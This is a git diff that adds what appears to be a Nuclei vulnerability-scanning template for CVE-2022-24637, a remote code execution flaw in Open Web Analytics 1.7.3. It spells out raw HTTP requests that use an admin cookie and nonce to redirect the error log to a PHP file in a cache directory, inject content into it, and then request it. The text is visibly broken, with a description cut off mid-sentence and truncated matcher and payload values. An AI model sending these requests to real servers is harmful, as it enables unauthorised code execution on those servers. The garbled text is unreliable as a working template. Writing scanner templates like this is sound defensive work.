diff --git a/http/cves/2022/CVE-2022-24637.yaml b/http/cves/2022/CVE-2022-24637.yaml new file mode 100644 index 0000000000..26d7428ae9 --- /dev/null +++ b/http/cves/2022/CVE-2022-24637.yaml @@ -0,0 +1,166 @@ +id: CVE-2022-24637 + +info: + name: Open Web Analytics 1.7.3 - Remote Code Execution + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '' + + matchers: + - type: word + part: body + words: + - ' + + - raw: + - | + POST /index.php?owa_do=base.optionsGeneral HTTP/1.1 + Host: {{Hostname}} + Cookie: owa_p={{http_4_owa_p}};owa_u=admin; + Content-Type: application/x-www-form-urlencoded + + owa_action=base.optionsUpdate&owa_nonce={{nonce}}&owa_config[base.error_log_file]=owa-data/caches/{{randstr}}.php&owa_config[base.error_log_level]=2 + + - raw: + - | + POST /index.php?owa_do=base.optionsGeneral HTTP/1.1 + Host: {{Hostname}} + Cookie: owa_p={{http_4_owa_p}};owa_u=admin; + Content-Type: application/x-www-form-urlencoded + + owa_action=base.optionsUpdate&owa_nonce={{nonce}}&owa_config[shell]= + + - | + GET /owa-data/caches/{{randstr}}.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '[debug_log]' + - "{{secret}}" + condition: and